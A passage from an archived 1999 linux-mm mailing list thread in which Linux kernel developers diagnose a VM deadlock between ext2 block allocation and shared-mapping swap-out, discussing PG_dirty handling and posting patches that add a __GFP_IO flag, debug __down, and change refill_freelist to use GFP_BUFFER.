>    have worked out what needs to happen for the mapped in memory case,
>    and I haven't quite gotten there.  Thank You.

Note that it is not finalized. That's why I didn't write the code (which
should be fairly simple), because it has some fairly subtle issues and
thus becomes a 2.3.x thing, I very much suspect.

Basically, my rule of thumb for the changes I did was: "it should have the
same code paths as the old code". What that means is that I didn't
actually do any changes that changed real code: I did only changes that
changed _behaviour_.

That way I can be reasonably hopeful that there are no new bugs introduced
even though performance is very different. I _do_ have some early data
that seems to say that this _has_ uncovered a very old deadlock condition: 
something that could happen before but was almost impossible to trigger. 

The deadlock I suspect is:
 - we're low on memory
 - we allocate or look up a new block on the filesystem. This involves
   getting the ext2 superblock lock, and doing a "bread()" of the free
   block bitmap block.
 - this causes us to try to allocate a new buffer, and we are so low on
   memory that we go into try_to_free_pages() to find some more memory.
 - try_to_free_pages() finds a shared memory file to page out.
 - trying to page that out, it looks up the buffers on the filesystem it
   needs, but deadlocks on the superblock lock.

Note that this could happen before too (I've not removed any of the
codepaths that could lead to it), but it was dynamically _much_ less
likely to happen.

I'm not even sure it really exists, but I have some really old reports
that _could_ be due to this, and a few more recent ones (that I never
could explain). And I have a few _really_ recent ones from here internally
at transmeta that looks like it's triggering more easily these days.

(Note that this is not actually pre5-related: I've been chasing this on
and off for some time, and it seems to have just gotten easier to trigger,
which is why I finally have a theory on what is going on - just a theory
though, and I may be completely off the mark). 

The positive news is that if I'm right in my suspicions it can only happen
with shared writable mappings or shared memory segments. The bad news is
that the bug appears rather old, and no immediate solution presents
itself. 

> 2) I have tested using PG_dirty from shrink_mmap and it is a
>    performance problem because it loses all locality of reference,
>    and because it forces shrink_mmap into a dual role, of freeing and
>    writing pages, which need seperate tuning.

Exactly. This is part of the complexity.

The right solution (I _think_) is to conceptually always mark it PG_dirty
in vmscan, and basically leave all the nasty cases to the filemap physical
page scan. But in the simple cases (ie a swap-cached page that is only
mapped by one process and doesn't have any other users), you'd start the
IO "early".

That would essentially mean that normal single mappings get the good
locality, while the case we really suck at right now (multiple mappings
which can all dirty the page) would not cause excessive page-outs. 

Basically, I think that the stuff we handle now with the swap-cache we do
well on already, and we'd only really want to handle the shared memory
case with PG_dirty. But I think this is a 2.3 issue, and I only added the
comment (and the PG_dirty define) for now. 

> Linus is this a case you feel is important to tune for 2.2?
> If so I would be happy to play with it.

It might be something good to test out, but I really don't want patches at
this date (unless your patches also fix the above deadlock problem, which
I can't see them doing ;)

		Linus

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 48%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 17:56 48%                                       ` Linus Torvalds
@ 1999-01-07 18:18 61%                                         ` Rik van Riel
  1999-01-07 18:55 59%                                         ` Zlatko Calusic
                                                           ` (4 subsequent siblings)
  5 siblings, 0 replies; 200+ results
From: Rik van Riel @ 1999-01-07 18:18 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Eric W. Biederman, Andrea Arcangeli, steve, brent verner,
	Garst R. Reese, Kalle Andersson, Zlatko Calusic, Ben McCann,
	Alan Cox, bredelin, Stephen C. Tweedie, linux-kernel, linux-mm

On Thu, 7 Jan 1999, Linus Torvalds wrote:
> On 6 Jan 1999, Eric W. Biederman wrote:


> > 2) I have tested using PG_dirty from shrink_mmap and it is a
> >    performance problem because it loses all locality of reference,
> >    and because it forces shrink_mmap into a dual role, of freeing and
> >    writing pages, which need seperate tuning.
> 
> Exactly. This is part of the complexity.

It can be solved by having a 'laundry' list like the *BSD
folks have and maybe a special worker thread to take care
of the laundry (optimizing placement on disk, etc).

> The right solution (I _think_) is to conceptually always mark it
> PG_dirty in vmscan, and basically leave all the nasty cases to the
> filemap physical page scan. But in the simple cases (ie a
> swap-cached page that is only mapped by one process and doesn't
> have any other users), you'd start the IO "early".
>
> That would essentially mean that normal single mappings get the good
> locality, while the case we really suck at right now (multiple mappings
> which can all dirty the page) would not cause excessive page-outs. 

We can already do that by simply not writing the page to
disk if there are other users besides us (keeping in mind
the swap cache and other system things).

One problem might be that we could end up with more on-disk
fragmentation that way (and maybe less clusterable I/O).

> Basically, I think that the stuff we handle now with the
> swap-cache we do well on already, and we'd only really want to
> handle the shared memory case with PG_dirty. But I think this is a
> 2.3 issue, and I only added the comment (and the PG_dirty define)
> for now.

It's quite definately 2.3. It's just a minor performance
issue for most systems (an extra write is an order of
magnitude cheaper than an extra read where a process is
actually waiting).


Rik -- If a Microsoft product fails, who do you sue?
+-------------------------------------------------------------------+
| Linux memory management tour guide.        riel@humbolt.geo.uu.nl |
| Scouting Vries cubscout leader.    http://humbolt.geo.uu.nl/~riel |
+-------------------------------------------------------------------+

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 61%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 14:11 45%                                     ` Andrea Arcangeli
@ 1999-01-07 18:19 55%                                       ` Linus Torvalds
  1999-01-07 20:35 64%                                         ` Andrea Arcangeli
  0 siblings, 1 reply; 200+ results
From: Linus Torvalds @ 1999-01-07 18:19 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: steve, brent verner, Garst R. Reese, Kalle Andersson,
	Zlatko Calusic, Ben McCann, bredelin, linux-kernel, linux-mm



On Thu, 7 Jan 1999, Andrea Arcangeli wrote:
> 
> This first patch allow swap_out to have a more fine grined weight. Should
> help at least in low memory envinronments.

The basic reason I didn't want to do this was that I thought it was wrong
to try to base _any_ decision on any virtual memory sizes. The reason is
simply that I think RSS isn't a very interesting thing to look at.

Yes, the current version also looks at RSS, but if you actually read the
code and think about what it does, it really only uses RSS as an
"ordering"  issue, and it doesn't actually matter for anything else -
we'll walk through all processes until they are all exhausted, and the
only thing that RSS does for us is to start off with the larger one.

Basically, it doesn't matter for anything but startup, because the steady
state will essentially just be a "go through each process in the list over
and over again", and the fact that the list has some ordering is pretty
much inconsequential. 

The real decision on what to throw out is done by the physical page scan,
that takes the PG_referenced bit into account.

So essentially, if we get anything wrong when we do the virtual page table
walk, the only thing that results in is that we might handle a few extra
page faults (not no extra IO, because the page faults will be satisfied
from the victim caches - the page cache and the swap cache). 

The only case this isn't true is the case where we have a shared file
mapping. That's where the PG_dirty issues come in - we've never done that
well from a performance standpoint, and pre-5 does not change that fact,
it just lays some foundations for doing it right in the future. 

So that's why I'd prefer to not complicate the VM counting any more. I
don't think it should make any fundamental difference (it might make a
difference in various extreme cases, but not, I think, under any kind of
realistic load).

But who knows, I've been wrong before. But now at least you know why I
didn't want it in the default kernel. 

> This other patch instead change a bit the trashing memory heuristic and
> how many pages are freed every time. I am not sure it's the best thing to
> do. So if you'll try it let me know the results... 

I think this might well be tuned some, although I think your patch is
extreme. I'd love to hear comments from people who test it under different
loads and different memory sizes.

		Linus

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 55%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 17:56 48%                                       ` Linus Torvalds
  1999-01-07 18:18 61%                                         ` Rik van Riel
@ 1999-01-07 18:55 59%                                         ` Zlatko Calusic
  1999-01-07 22:57 62%                                         ` Linus Torvalds
                                                           ` (3 subsequent siblings)
  5 siblings, 0 replies; 200+ results
From: Zlatko Calusic @ 1999-01-07 18:55 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Eric W. Biederman, Andrea Arcangeli, steve, brent verner,
	Garst R. Reese, Kalle Andersson, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm

Linus Torvalds <torvalds@transmeta.com> writes:

[snip]
> 
> That way I can be reasonably hopeful that there are no new bugs introduced
> even though performance is very different. I _do_ have some early data
> that seems to say that this _has_ uncovered a very old deadlock condition: 
> something that could happen before but was almost impossible to trigger. 
> 
> The deadlock I suspect is:
>  - we're low on memory
>  - we allocate or look up a new block on the filesystem. This involves
>    getting the ext2 superblock lock, and doing a "bread()" of the free
>    block bitmap block.
>  - this causes us to try to allocate a new buffer, and we are so low on
>    memory that we go into try_to_free_pages() to find some more memory.
>  - try_to_free_pages() finds a shared memory file to page out.
>  - trying to page that out, it looks up the buffers on the filesystem it
>    needs, but deadlocks on the superblock lock.
> 
> Note that this could happen before too (I've not removed any of the
> codepaths that could lead to it), but it was dynamically _much_ less
> likely to happen.

You could be very easily right. Look below.

> 
> I'm not even sure it really exists, but I have some really old reports
> that _could_ be due to this, and a few more recent ones (that I never
> could explain). And I have a few _really_ recent ones from here internally
> at transmeta that looks like it's triggering more easily these days.
> 
> (Note that this is not actually pre5-related: I've been chasing this on
> and off for some time, and it seems to have just gotten easier to trigger,
> which is why I finally have a theory on what is going on - just a theory
> though, and I may be completely off the mark). 
> 
> The positive news is that if I'm right in my suspicions it can only happen
> with shared writable mappings or shared memory segments. The bad news is
> that the bug appears rather old, and no immediate solution presents
> itself. 

Exactly. I was torture testing shared mapping when I got very weird
deadlock. It happened only once, few days ago. Look at report and
enjoy:

Jan  5 03:49:14 atlas kernel: SysRq: Show Memory 
Jan  5 03:49:14 atlas kernel: Mem-info: 
Jan  5 03:49:14 atlas kernel: Free pages:         512kB 
Jan  5 03:49:14 atlas kernel:  ( Free: 128 (128 256 384) 
Jan  5 03:49:14 atlas kernel: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 4*128kB = 512kB) 
Jan  5 03:49:14 atlas kernel: Swap cache: add 131125/131125, delete 130652/13065
2, find 0/0 
Jan  5 03:49:14 atlas kernel: Free swap:       231632kB 
Jan  5 03:49:14 atlas kernel: 16384 pages of RAM 
Jan  5 03:49:14 atlas kernel: 956 reserved pages 
Jan  5 03:49:14 atlas kernel: 17996 pages shared 
Jan  5 03:49:14 atlas kernel: 473 pages swap cached 
Jan  5 03:49:14 atlas kernel: 13 pages in page table cache 
Jan  5 03:49:14 atlas kernel: Buffer memory:    14696kB 
Jan  5 03:49:14 atlas kernel: Buffer heads:     14732 
Jan  5 03:49:14 atlas kernel: Buffer blocks:    14696 
Jan  5 03:49:14 atlas kernel:    CLEAN: 144 buffers, 18 used (last=122), 0 locke
d, 0 protected, 0 dirty 

This looks exactly like the problem you were describing, isn't it?

[snip]
> Basically, I think that the stuff we handle now with the swap-cache we do
> well on already, and we'd only really want to handle the shared memory
> case with PG_dirty. But I think this is a 2.3 issue, and I only added the
> comment (and the PG_dirty define) for now. 

Nice, thanks. That will make experimenting slightly easier and will
give courage to people to actually experiment with PG_Dirty
implementation. So far, only Eric did some work in this area.

Of course, this is all 2.3 work.

> 
> > Linus is this a case you feel is important to tune for 2.2?
> > If so I would be happy to play with it.
> 
> It might be something good to test out, but I really don't want patches at
> this date (unless your patches also fix the above deadlock problem, which
> I can't see them doing ;)
> 

Sure!
-- 
Zlatko
--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 59%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 17:56 48%                                       ` Linus Torvalds
  1999-01-07 18:18 61%                                         ` Rik van Riel
  1999-01-07 18:55 59%                                         ` Zlatko Calusic
@ 1999-01-07 22:57 62%                                         ` Linus Torvalds
  1999-01-08  1:16 60%                                           ` Linus Torvalds
  1999-01-08  2:56 54%                                         ` Eric W. Biederman
                                                           ` (2 subsequent siblings)
  5 siblings, 1 reply; 200+ results
From: Linus Torvalds @ 1999-01-07 22:57 UTC (permalink / raw)
  To: Eric W. Biederman
  Cc: Andrea Arcangeli, steve, brent verner, Garst R. Reese,
	Kalle Andersson, Zlatko Calusic, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm



On Thu, 7 Jan 1999, Linus Torvalds wrote:
> 
> The deadlock I suspect is:
>  - we're low on memory
>  - we allocate or look up a new block on the filesystem. This involves
>    getting the ext2 superblock lock, and doing a "bread()" of the free
>    block bitmap block.
>  - this causes us to try to allocate a new buffer, and we are so low on
>    memory that we go into try_to_free_pages() to find some more memory.
>  - try_to_free_pages() finds a shared memory file to page out.
>  - trying to page that out, it looks up the buffers on the filesystem it
>    needs, but deadlocks on the superblock lock.

Confirmed. Hpa was good enough to reproduce this, and my debugging code
caught the (fairly deep) deadlock: 

	system_call ->
	sys_write ->
	ext2_file_write ->
	ext2_getblk ->
	ext2_alloc_block ->	** gets superblock lock **
	ext2_new_block ->
	getblk ->
	refill_freelist ->
	grow_buffers ->
	__get_free_pages ->
	try_to_free_pages ->
	swap_out ->
	swap_out_process ->
	swap_out_vma ->
	try_to_swap_out ->
	filemap_swapout ->
	filemap_write_page ->
	ext2_file_write ->
	ext2_getblk ->
	ext2_alloc_block ->
	__wait_on_super		** BOOM - we want the superblock lock again **

and I suspect the fix is fairly simple: I'll just add back the __GFP_IO
bit (we kind of used to have one that did something similar) which will
make the swap-out code not write out shared pages when it allocates
buffers. 

The better fix would actually be to make sure that filesystems do not hold
locks around these kinds of blocking operations, but that is harder to do
at this late stage.

		Linus

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 62%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 18:19 55%                                       ` Linus Torvalds
@ 1999-01-07 20:35 64%                                         ` Andrea Arcangeli
  1999-01-07 23:51 64%                                           ` Linus Torvalds
  0 siblings, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-07 20:35 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: steve, brent verner, Garst R. Reese, Kalle Andersson,
	Zlatko Calusic, Ben McCann, bredelin, linux-kernel, linux-mm

On Thu, 7 Jan 1999, Linus Torvalds wrote:

> 
> 
> On Thu, 7 Jan 1999, Andrea Arcangeli wrote:
> > 
> > This first patch allow swap_out to have a more fine grined weight. Should
> > help at least in low memory envinronments.
> 
> The basic reason I didn't want to do this was that I thought it was wrong
> to try to base _any_ decision on any virtual memory sizes. The reason is
> simply that I think RSS isn't a very interesting thing to look at.

But now I am not looking at RSS, I am looking only at total_vm. The point
of the patch is only to be _balanced_ between passes even if in the system
there are some processes with a total_vm of 1Giga and some processes that
has a total_vm of 1kbyte. In normal conditions the patch _should_ make no
differences... This in my theory at least ;)

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 20:35 64%                                         ` Andrea Arcangeli
@ 1999-01-07 23:51 64%                                           ` Linus Torvalds
  1999-01-08  0:04 64%                                             ` Andrea Arcangeli
  0 siblings, 1 reply; 200+ results
From: Linus Torvalds @ 1999-01-07 23:51 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: steve, brent verner, Garst R. Reese, Kalle Andersson,
	Zlatko Calusic, Ben McCann, bredelin, linux-kernel, linux-mm



On Thu, 7 Jan 1999, Andrea Arcangeli wrote:
> > The basic reason I didn't want to do this was that I thought it was wrong
> > to try to base _any_ decision on any virtual memory sizes. The reason is
> > simply that I think RSS isn't a very interesting thing to look at.
> 
> But now I am not looking at RSS, I am looking only at total_vm. The point
> of the patch is only to be _balanced_ between passes even if in the system
> there are some processes with a total_vm of 1Giga and some processes that
> has a total_vm of 1kbyte. In normal conditions the patch _should_ make no
> differences... This in my theory at least ;)

Ehh, and how do you protect against somebody playing games with your mind
by doing _huge_ mappings of something that takes no real memory? The VM
footprint of a process is not necessarily related to how much physical
memory you use. 

Basically, I think the thing should either be simple or right, and yours
is somewhere in between - neither simple nor strictly correct.

Also, I've been happily deleting code, and it has worked wonderfully. This
patch adds logic and code back.

		Linus

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 23:51 64%                                           ` Linus Torvalds
@ 1999-01-08  0:04 64%                                             ` Andrea Arcangeli
  0 siblings, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-08  0:04 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: linux-kernel, linux-mm

On Thu, 7 Jan 1999, Linus Torvalds wrote:

> Ehh, and how do you protect against somebody playing games with your mind
> by doing _huge_ mappings of something that takes no real memory? The VM
> footprint of a process is not necessarily related to how much physical
> memory you use. 

I was infact rejecting from the total_vm calc all tasks with a rss == 0,
but yes, I am convinced that my more fine grined counter is not needed.

Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 22:57 62%                                         ` Linus Torvalds
@ 1999-01-08  1:16 60%                                           ` Linus Torvalds
  1999-01-08 10:45 50%                                             ` Andrea Arcangeli
  0 siblings, 1 reply; 200+ results
From: Linus Torvalds @ 1999-01-08  1:16 UTC (permalink / raw)
  To: Eric W. Biederman
  Cc: Andrea Arcangeli, steve, brent verner, Garst R. Reese,
	Kalle Andersson, Zlatko Calusic, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm



On Thu, 7 Jan 1999, Linus Torvalds wrote:
>
> and I suspect the fix is fairly simple: I'll just add back the __GFP_IO
> bit (we kind of used to have one that did something similar) which will
> make the swap-out code not write out shared pages when it allocates
> buffers. 

Ok, here it is.. Stable.

		Linus

-----
diff -u --recursive --new-file v2.2.0-pre5/linux/include/linux/mm.h linux/include/linux/mm.h
--- v2.2.0-pre5/linux/include/linux/mm.h	Thu Jan  7 15:11:40 1999
+++ linux/include/linux/mm.h	Thu Jan  7 15:04:54 1999
@@ -315,14 +323,15 @@
 #define __GFP_LOW	0x02
 #define __GFP_MED	0x04
 #define __GFP_HIGH	0x08
+#define __GFP_IO	0x10
 
 #define __GFP_DMA	0x80
 
 #define GFP_BUFFER	(__GFP_LOW | __GFP_WAIT)
 #define GFP_ATOMIC	(__GFP_HIGH)
-#define GFP_USER	(__GFP_LOW | __GFP_WAIT)
-#define GFP_KERNEL	(__GFP_MED | __GFP_WAIT)
-#define GFP_NFS		(__GFP_HIGH | __GFP_WAIT)
+#define GFP_USER	(__GFP_LOW | __GFP_WAIT | __GFP_IO)
+#define GFP_KERNEL	(__GFP_MED | __GFP_WAIT | __GFP_IO)
+#define GFP_NFS		(__GFP_HIGH | __GFP_WAIT | __GFP_IO)
 
 /* Flag - indicates that the buffer will be suitable for DMA.  Ignored on some
    platforms, used as appropriate on others */
diff -u --recursive --new-file v2.2.0-pre5/linux/mm/vmscan.c linux/mm/vmscan.c
--- v2.2.0-pre5/linux/mm/vmscan.c	Thu Jan  7 15:11:41 1999
+++ linux/mm/vmscan.c	Thu Jan  7 15:09:46 1999
@@ -76,7 +76,6 @@
 		set_pte(page_table, __pte(entry));
 drop_pte:
 		vma->vm_mm->rss--;
-		tsk->nswap++;
 		flush_tlb_page(vma, address);
 		__free_page(page_map);
 		return 0;
@@ -99,6 +98,14 @@
 		pte_clear(page_table);
 		goto drop_pte;
 	}
+
+	/*
+	 * Don't go down into the swap-out stuff if
+	 * we cannot do I/O! Avoid recursing on FS
+	 * locks etc.
+	 */
+	if (!(gfp_mask & __GFP_IO))
+		return 0;
 
 	/*
 	 * Ok, it's really dirty. That means that


--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 60%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 17:56 48%                                       ` Linus Torvalds
                                                           ` (2 preceding siblings ...)
  1999-01-07 22:57 62%                                         ` Linus Torvalds
@ 1999-01-08  2:56 54%                                         ` Eric W. Biederman
  1999-01-09  0:50 60%                                         ` David S. Miller
  1999-01-09  2:13 51%                                         ` Stephen C. Tweedie
  5 siblings, 0 replies; 200+ results
From: Eric W. Biederman @ 1999-01-08  2:56 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Andrea Arcangeli, steve, brent verner, Garst R. Reese,
	Kalle Andersson, Zlatko Calusic, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm

>>>>> "LT" == Linus Torvalds <torvalds@transmeta.com> writes:

LT> On 6 Jan 1999, Eric W. Biederman wrote:
>> 
>> 1) With your comments on PG_dirty/(what shrink_mmap should do) you
>> have worked out what needs to happen for the mapped in memory case,
>> and I haven't quite gotten there.  Thank You.

LT> Note that it is not finalized. That's why I didn't write the code (which
LT> should be fairly simple), because it has some fairly subtle issues and
LT> thus becomes a 2.3.x thing, I very much suspect.

The code probably will be simple enough, but there are issues.
The complete issue for 2.3.x is dirty data in the page cache,
mapped shared pages are just a small subset.

This will be much more important for NFS, e2compr, and not
double buffering between the page cache and the buffer cache,
than for this case.


>> 2) I have tested using PG_dirty from shrink_mmap and it is a
>> performance problem because it loses all locality of reference,
>> and because it forces shrink_mmap into a dual role, of freeing and
>> writing pages, which need seperate tuning.

LT> Exactly. This is part of the complexity.

LT> The right solution (I _think_) is to conceptually always mark it PG_dirty
LT> in vmscan, and basically leave all the nasty cases to the filemap physical
LT> page scan. But in the simple cases (ie a swap-cached page that is only
LT> mapped by one process and doesn't have any other users), you'd start the
LT> IO "early".

This sounds good for the subset of the problem you are considering.

>From where I'm at something that allocates a streamlined buffer_head
to the diry pages, sounds even better.  That and having a peridic
scan of the page tables that removes the dirty bit and marks the 
pages dirty, before we need the pages to be clean.

LT> Basically, I think that the stuff we handle now with the swap-cache we do
LT> well on already, and we'd only really want to handle the shared memory
LT> case with PG_dirty. But I think this is a 2.3 issue, and I only added the
LT> comment (and the PG_dirty define) for now. 

Thanks it does give some encouragement and some relief.  There are enough
things to get shaken out,  I am much more comfortable with early 2.3,
where we have time to convert things to a new way of doing things.

LT> It might be something good to test out, but I really don't want patches at
LT> this date (unless your patches also fix the above deadlock problem, which
LT> I can't see them doing ;)

Then I will proceed with my previous plan and see if I can get a fairly
complete set of patches ready for 2.3.early

Eric

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 54%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-08  1:16 60%                                           ` Linus Torvalds
@ 1999-01-08 10:45 50%                                             ` Andrea Arcangeli
  1999-01-08 19:06 64%                                               ` Linus Torvalds
  0 siblings, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-08 10:45 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Eric W. Biederman, steve, brent verner, Garst R. Reese,
	Kalle Andersson, Zlatko Calusic, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm

On Thu, 7 Jan 1999, Linus Torvalds wrote:

> Ok, here it is.. Stable.

Yesterday after your email I tried and I been able to reproduce the
deadlock here too. It's trivial, simply alloc a shared mapping of 160Mbyte
and start dirtifying it and msync it in loop. So I applyed your patch and
the machine still deadlocked after some second. I thought "argg
update_shared_mappings is faulting noooooo"!! So I removed
updated_shared_mappings() and I tried again and it still deadlocked... I
thought "oh, cool, I still have something to fix ;)". 

So I developed this debugging code (that I post here because I guess it
could be useful also to many others) to know which was the still pending
bug:

Index: sched.c
===================================================================
RCS file: /var/cvs/linux/kernel/sched.c,v
retrieving revision 1.1.1.1.2.37
diff -u -r1.1.1.1.2.37 sched.c
--- sched.c	1999/01/07 11:57:23	1.1.1.1.2.37
+++ sched.c	1999/01/08 10:41:53
@@ -22,6 +22,10 @@
  * current-task
  */
 
+/*
+ * Debug down() code. Copyright (C) 1999  Andrea Arcangeli
+ */
+
 #include <linux/mm.h>
 #include <linux/kernel_stat.h>
 #include <linux/fdreg.h>
@@ -893,12 +897,27 @@
 	tsk->state = TASK_RUNNING;		\
 	remove_wait_queue(&sem->wait, &wait);
 
+void generate_oops (struct semaphore *sem)
+{
+	sema_init(sem, 9876);
+	wake_up(&sem->wait);
+}
+
 void __down(struct semaphore * sem)
 {
 	DOWN_VAR
+	struct timer_list timer;
+	init_timer (&timer);
+	timer.expires = jiffies + HZ*20;
+	timer.data = (unsigned long) sem;
+	timer.function = (void (*)(unsigned long)) generate_oops;
+	add_timer(&timer);
 	DOWN_HEAD(TASK_UNINTERRUPTIBLE)
 	schedule();
+	if (atomic_read(&sem->count) == 9876)
+		*(int *) 0 = 0;
 	DOWN_TAIL(TASK_UNINTERRUPTIBLE)
+	del_timer(&timer);
 }
 
 int __down_interruptible(struct semaphore * sem)


Then recompiled, rebooted, return to run the deadlocking proggy, deadlocked
again after some seconds and after 20 second I had a
nice Oops on the screen. SysRQ-K helped me to restore some functionality
in another console. Then I run dmesg | ksymoops.... and I had this:

Using `/usr/src/linux/System.map' to map addresses to symbols.

>>EIP: c0111646 <__down+b2/160>
Trace: c0111574 <generate_oops>
Trace: c0189f58 <__down_failed+8/10>
Trace: c010ef1a <do_page_fault+56/340>
Trace: c0108c0d <error_code+2d/40>
Trace: c0111646 <__down+b2/160>
Trace: c0111574 <generate_oops>
Trace: c0189f58 <__down_failed+8/10>
Trace: c011dc59 <filemap_write_page+9d/138>
Trace: c011dd59 <filemap_swapout+65/7c>
Trace: c0121864 <try_to_swap_out+118/1c4>
Trace: c0121a18 <swap_out_vma+108/164>
Trace: c0121ad4 <swap_out_process+60/88>
Trace: c0121bdb <swap_out+df/fc>
Trace: c011cbb7 <shrink_mmap+11b/138>
Trace: c0121d1a <free_user_and_cache+1e/34>
Trace: c0121d76 <try_to_free_pages+46/a4>
Trace: c0122615 <__get_free_pages+d5/220>
Trace: c0126af2 <get_hash_table+52/64>
Trace: c0127bcf <grow_buffers+3b/ec>
Trace: c0126ca8 <refill_freelist+c/34>
Trace: c0126f3a <getblk+202/228>
Trace: c013af6c <ext2_alloc_block+68/13c>
Trace: c013b5c4 <block_getblk+15c/2b0>
Trace: c013b887 <ext2_getblk+16f/20c>
Trace: c0139d2b <ext2_file_write+40b/554>
Trace: c011dcc0 <filemap_write_page+104/138>
Trace: c011e0fe <filemap_sync+256/30c>
Trace: c011e297 <msync_interval+2f/7c>
Trace: c011e3d2 <sys_msync+ee/14c>
Trace: c0108ad4 <system_call+34/40>
Code: c0111646 <__down+b2/160> 
Code: c0111646 <__down+b2/160>  c7 05 00 00 00 	movl   $0x0,0x0
Code: c011164b <__down+b7/160>  00 00 00 00 00 
Code: c0111656 <__down+c2/160>  8b 75 d8       	movl   0xffffffd8(%ebp),%esi
Code: c0111659 <__down+c5/160>  c7 06 02 00 00 	movl   $0x2,(%esi)
Code: c011165f <__down+cb/160>  31 00          	xorl   %eax,(%eax)
Code: c0111667 <__down+d3/160>  90             	nop    
Code: c0111668 <__down+d4/160>  90             	nop    
Code: c0111669 <__down+d5/160>  90             	nop    

So I looked at buffer.c ;)

Index: buffer.c
===================================================================
RCS file: /var/cvs/linux/fs/buffer.c,v
retrieving revision 1.1.1.1.2.8
diff -u -r1.1.1.1.2.8 buffer.c
--- buffer.c	1999/01/07 11:57:21	1.1.1.1.2.8
+++ linux/fs/buffer.c	1999/01/08 10:27:09
@@ -689,7 +689,7 @@
  */
 static void refill_freelist(int size)
 {
-	if (!grow_buffers(GFP_KERNEL, size)) {
+	if (!grow_buffers(GFP_BUFFER, size)) {
 		wakeup_bdflush(1);
 		current->policy |= SCHED_YIELD;
 		schedule();


and now is really stable ;))

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 50%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-08 10:45 50%                                             ` Andrea Arcangeli
@ 1999-01-08 19:06 64%                                               ` Linus Torvalds
  0 siblings, 0 replies; 200+ results
From: Linus Torvalds @ 1999-01-08 19:06 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: Eric W. Biederman, steve, brent verner, Garst R. Reese,
	Kalle Andersson, Zlatko Calusic, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm



On Fri, 8 Jan 1999, Andrea Arcangeli wrote:
> 
> So I looked at buffer.c ;)

Ehh, duh. I had it right in my tree, but the _patch_ I sent out only had
my mm changes, but not my fs changes. 

Embarrassing ;)

		Linus

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: a bug report
  1999-01-07 15:53 64% a bug report radium
